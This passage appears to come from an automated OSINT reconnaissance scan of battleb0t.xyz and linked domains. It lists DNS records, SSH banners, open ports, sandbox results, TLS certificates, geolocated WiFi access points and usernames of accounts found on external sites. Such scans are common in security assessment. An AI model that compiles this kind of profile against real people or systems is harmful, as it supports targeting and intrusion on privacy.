{"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", 
"resolved_at": "2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", 
"resolved_at": "2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", 
"why.posadisad.com", "www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", 
"rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:37:F0:E0) | 39.0469, -77.4903 |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | YouTube User2 (Category: video)<br>https://www.youtube.com/@baptistevauthey | baptistevauthey |
| 2023-05-12 02:54:16 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 200 | oldfluid.battleb0t.xyz |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2052 | 104.21.71.14 |
| 2023-05-12 02:54:18 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://pics.battleb0t.xyz/gallery.css |
| 2023-05-12 02:44:18 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Varnish | www.battleb0t.xyz |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.197): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EF:F5:78) | 41.8781, -87.6298 |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.190): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:50 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | 34.148.97.127:443 | 34.148.97.127 |
| 2023-05-12 02:53:48 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://urldefense.com/v3/__https:/luckycarrotapp.com/organization-b2__;!!FBg0PJ8GdnjP4Q!8c3hK7I-XFYCk7Nsu_a_9ZxOtOzs4BD4Qzz4xaaEEmIdhXPGsEafhFGfqwLPGWafWHCBltJqzsIwT7XW_a2-1-v3BYjmMONK6mxg0p8$', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f94_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f94_IESQMMUTEX_0_519"\n "IsoScope_f94_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3988"\n "IsoScope_f94_IESQMMUTEX_0_331"\n "IsoScope_f94_IE_EarlyTabStart_0xe00_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f94_ConnHashTable<3988>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': 
None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.80.202.17:443"\n "172.66.43.26:443"\n "20.38.109.4:443"\n "104.16.187.65:443"\n "104.18.230.83:443"\n "185.199.109.153:443"\n "104.18.136.59:443"\n "157.240.22.25:443"\n "104.16.121.190:443"\n "77.88.21.119:443"\n "104.18.25.196:443"\n "104.17.99.172:443"\n "104.16.136.206:443"\n "74.125.137.156:443"\n "104.19.154.83:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.producthunt.com"\n "assets.calendly.com"\n "buttons.github.io"\n "connect.facebook.net"\n "js.hs-analytics.net"\n "js.hs-banner.com"\n "js.hs-scripts.com"\n "js.hsadspixel.net"\n "js.hsforms.net"\n "js.usemessages.com"\n "luckycarrot.blob.core.windows.net"\n "mc.yandex.com"\n "mc.yandex.ru"\n "stats.g.doubleclick.net"\n "track.hubspot.com"\n "urldefense.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<meta property="twitter:image" content="https://luckycarrotapp.com/images/carrot-logo1111.png">" (Indicator: "twitter")\n "<meta property="twitter:title" content="Peer to peer recognition" />" (Indicator: "twitter")\n "<meta property="twitter:description" content="The best way to recognize and reward employees for their hard work. Boost employee engagement and motivation with Lucky Carrot." 
/>" (Indicator: "twitter")\n "<img height="1" width="1" src="https://www.facebook.com/tr?id=2186666338068573&ev=PageView&noscript=1" alt="facebook" />" (Indicator: "facebook.com")\n "<button class="button btn-fill-orange watch-video-btn video-modal" title="Watch a Video" data-video="https://www.youtube.com/embed/d4_e3pCgUW8?autoplay=1">" (Indicator: "youtube")\n "<a href="https://www.facebook.com/EmployeeEngagementPlatform/" target="_blank">" (Indicator: "facebook.com")\n "<a href="https://am.linkedin.com/company/luckycarrot" target="_blank">" (Indicator: "linkedin.com")\n "<a href="https://www.youtube.com/channel/UCb0UW89RRlZK6jZQUT3SRHQ" target="_blank">" (Indicator: "youtube")\n "<img src="/images/newLandingPage/icons/social-icons/youtube-icon.svg" />" (Indicator: "youtube")\n "<a href="https://mobile.twitter.com/carrot_lucky" target="_blank">" (Indicator: "twitter")\n "<img src="/images/newLandingPage/icons/social-icons/twitter-icon.svg" />" (Indicator: "twitter")\n ""https://www.facebook.com/rewardsmadefunagain/"," (Indicator: "facebook.com")\n ""https://twitter.com/carrot_lucky"," (Indicator: "twitter")\n ""https://www.youtube.com/channel/UCb0UW89RRlZK6jZQUT3SRHQ"," (Indicator: "youtube")\n ""https://www.linkedin.com/company/13047360"" (Indicator: "linkedin.com")\n "<img height="1" width="1" style="display:none;" alt="" src="https://px.ads.linkedin.com/collect/?pid=1512212&fmt=gif" />" (Indicator: "linkedin.com")\n "{state:0,transportUrl:b,context:c,parent:Wk()},P(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Jh.ja+"&cx=c";Tr()&&(f+="&sign="+Jh.Xe);var g=Sh||ci?Sr(b,f):void 0;g||(g=Fo("https://","http://",Jh.ze+f));Qk().destination[a]={state:1,context:c,parent:Wk()};mc(g)}};function Ur(){if(Ok()){return!0}return!1};var Xr=new 
RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),Yr={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},Zr={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "var Jv=function(a,b,c){function d(){var g=a();f+=e?(Ua()-e)*g.playbackRate/1E3:0;e=Ua()}var e=0,f=0;return{createEvent:function(g,h,m){var n=a(),p=n.Lg,q=void 0!==m?Math.round(m):void 0!==h?Math.round(n.Lg*h):Math.round(n.Pi),r=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100),t=G.hidden?!1:.5<=Pi(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=lv(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube")\n "b,"vert.pix");break;case "PERCENT":qy(d.verticalThresholds,b,"vert.pct")}pv("sdl","init",!1)?pv("sdl","pending",!1)||I(function(){return ry()}):(nv("sdl","init",!0),nv("sdl","pending",!0),I(function(){ry();if(sy()){var e=ty();qc(z,"scroll",e);qc(z,"resize",e)}else nv("sdl","init",!1)}));return b}xy.N="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),yy=["www.youtube.com","www.youtube-nocookie.com"],zy,Ay=!1;" (Indicator: "youtube")\n "m=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Gg:d,Eg:e,Fg:f,lh:g,mh:h,Wd:m,ib:b},p=z.YT,q=function(){Gy(n)};if(p)return p.ready&&p.ready(q),b;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};I(function(){for(var t=G.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(Jy(w,"iframe_api")||Jy(w,"player_api"))return b}for(var 
x=G.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!Ay&&Hy(x[A],n.Wd))return mc("https://www.youtube.com/iframe_api")," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"golden-kitty-badge_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "lucky%20carrot%20logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "bring-visibility_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mini-teams-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "message-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "build-a-recognition-culture_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "promote-core-values_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mail_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mini-slack-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "instagram-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "min-jira-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "rewards-as-experiences_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n 
"twitter-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "youtube-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "linkedin-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "facebook-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "min-zoom-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "video-play_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Icon-feather-check-orange_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-39' | 185.199.109.153 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | imgur (Category: images)<br>https://imgur.com/user/Altpapier/about | Altpapier |
| 2023-05-12 02:44:27 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi2.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:50:55:6d:e5:64:92:a0:7f:d0:de:03:2b:af:77:c2:fc:fe
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: May 4 19:22:49 2023 GMT
Not After : Aug 2 19:22:48 2023 GMT
Subject: CN=nwapi2.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c4:56:92:fa:17:84:ee:f0:d0:57:46:44:1b:c0:
a4:14:29:10:a1:ef:73:a4:e7:64:f7:b5:e7:3f:b3:
66:76:75:96:94:eb:49:c3:b4:7b:98:99:f2:0f:53:
8b:0d:5d:a1:7d:07:f5:ec:33:33:f7:d8:24:d7:52:
d5:12:6d:a1:1f:e4:a6:4e:04:dc:3d:ec:3d:be:c0:
68:52:81:bd:0e:b0:f2:dc:e9:9e:c3:80:ab:29:55:
f9:1e:e7:5b:91:26:2d:a5:23:af:31:21:a7:26:77:
4d:22:98:0f:3c:48:92:7d:11:24:a2:2a:0b:37:5b:
b7:75:5d:9c:47:56:23:11:ea:1f:65:df:5a:99:2d:
b1:7c:34:88:13:dd:65:4f:a0:08:9d:d3:51:25:a6:
78:33:43:63:15:48:98:b7:c9:2d:ff:76:3d:7c:7e:
de:53:44:95:89:fa:a0:73:8e:18:62:72:8d:27:49:
aa:9c:1f:aa:7b:22:63:3f:e5:47:2d:46:e9:11:a7:
d9:be:31:17:58:ae:26:cb:94:ea:b8:74:2e:d5:e8:
97:bd:26:29:ad:75:15:d7:0b:3c:87:ec:7d:26:04:
ba:6b:7d:a6:11:27:4a:69:b1:b7:ca:99:b8:9d:ff:
7b:56:12:82:6a:1b:ca:28:1f:06:65:69:79:cd:93:
18:d1:f0:f1:97:01:54:01:52:f9:a4:bc:b1:5f:7f:
07:cd:e4:2b:75:9a:b4:04:a5:b3:96:5c:fa:5f:34:
4a:10:9c:af:38:59:33:75:87:74:42:bf:9b:c5:16:
68:7e:6e:ef:bf:b4:49:f4:b3:b2:df:03:0b:41:57:
bd:9d:b3:e1:0a:ab:4d:b6:f0:4f:0a:55:ab:67:0d:
47:01:8e:e0:df:09:34:38:59:4b:e4:b2:f9:93:a9:
14:cd:7f:e8:59:e4:10:fd:c1:6c:48:fa:be:99:2c:
29:f5:4b:bb:ec:4a:d6:b7:12:55:98:93:98:eb:47:
5c:a0:a4:28:64:3b:23:a2:ef:82:47:19:63:8d:bd:
5b:18:22:cf:f0:62:27:bf:ee:4a:28:c1:7c:e2:7b:
78:12:dd:d5:e8:7d:85:3e:1e:0f:49:a2:f3:4c:aa:
0d:2d:cc:58:f9:3e:e7:38:d6:30:4c:04:5a:18:cf:
9c:92:c9:94:e0:25:8d:f8:47:4e:48:b9:1f:15:b5:
e5:de:4b:35:84:12:32:49:2b:fa:a7:68:2a:1b:83:
d8:7f:e6:d9:7f:ca:74:5f:b4:c9:a0:67:b2:29:ff:
a2:1e:11:be:bc:99:7a:fb:44:7b:a4:fe:9c:6b:8f:
e3:20:e4:b7:4f:84:65:a3:c1:39:7b:b5:4f:1d:d0:
69:a0:23
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CB:34:4D:A2:38:84:54:47:A0:B5:F7:DD:3C:83:22:CF:57:4A:1C:21
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi2.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : May 4 20:22:49.987 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:49:5B:22:9A:37:74:EC:B5:6B:BF:74:25:
03:BF:46:DC:18:51:D6:44:11:7B:BF:B6:5B:50:DD:1C:
8F:80:EF:3B:02:20:47:2A:69:10:84:9E:DC:B5:E3:E3:
85:D7:64:E9:81:E6:34:A8:3A:EE:7B:C1:B6:5E:40:1F:
80:29:DA:11:05:13
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : May 4 20:22:50.005 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:35:7C:BF:0E:AA:9D:74:86:07:D7:D4:AB:
F5:E1:40:37:B8:BB:7E:DB:39:8A:BE:E2:5C:03:30:30:
87:33:6B:95:02:20:09:90:FF:C6:9A:73:8C:96:C5:27:
7D:6B:43:B6:38:71:2C:A6:63:43:70:C3:FA:5D:5B:71:
98:69:EE:13:00:4E
Signature Algorithm: sha256WithRSAEncryption
85:ff:2d:f7:ea:a0:91:b7:ce:aa:d9:bb:80:7c:e2:3c:82:5e:
aa:e4:8e:68:39:36:38:9c:77:b6:ea:24:b5:71:a4:68:73:d2:
cb:e4:b6:6e:87:92:cd:60:f0:4b:fa:16:3c:67:67:24:50:45:
a7:67:96:84:cc:d3:58:c6:5e:dc:44:85:ed:d6:81:ec:7f:49:
41:4d:c5:ca:ca:aa:32:ad:d7:11:f7:39:7b:b0:7b:77:74:44:
f7:cb:92:93:e4:45:e9:c1:4b:22:0e:6a:87:26:da:2f:86:c9:
2f:7d:8a:b8:0e:fa:c8:7d:05:d7:2e:5e:0f:61:c0:b7:f9:d9:
51:31:63:4f:68:5d:de:cc:22:12:04:48:9b:ee:41:d8:a5:b1:
3c:80:9c:7b:d1:ae:a7:5b:ac:bf:bc:03:e4:36:bf:0d:18:f2:
3c:c8:4d:81:d8:71:4f:93:f8:89:4f:b8:cc:c6:d5:23:b9:6b:
01:1a:ea:aa:63:1c:40:bd:2f:59:0a:34:b7:be:8a:f1:7e:27:
85:d0:0e:96:7f:f0:0b:eb:18:35:77:95:6b:27:bf:9c:18:72:
58:89:63:0e:ed:84:1b:cb:e1:47:d4:7e:b0:01:ca:b1:c2:f0:
7c:b9:e4:20:fc:db:bd:c2:a6:6c:47:1a:fc:14:e6:86:84:df:
57:0b:c2:0b
|
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01010101lzy.github.io | 185.199.111.153 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.123): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:36:51 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | Medellin, Colombia | 188.114.97.1 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 6566 1651 (Net ID: 00:00:C5:D7:63:6C) | 34.0544, -118.244 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WaveLAN Network VHome2B (Net ID: 00:02:2D:03:03:11) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MDD (Net ID: 00:02:2D:21:9D:34) | 37.7642, -122.3993 |
| 2023-05-12 03:11:21 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 50.1188, 8.6843 | 46.101.229.70 |
| 2023-05-12 02:44:22 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:91:08:65:b4:56:94:e3:89:37:6b:c8:ee:5a:fc:f4:80:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:05:11 2023 GMT
Not After : May 25 03:05:10 2023 GMT
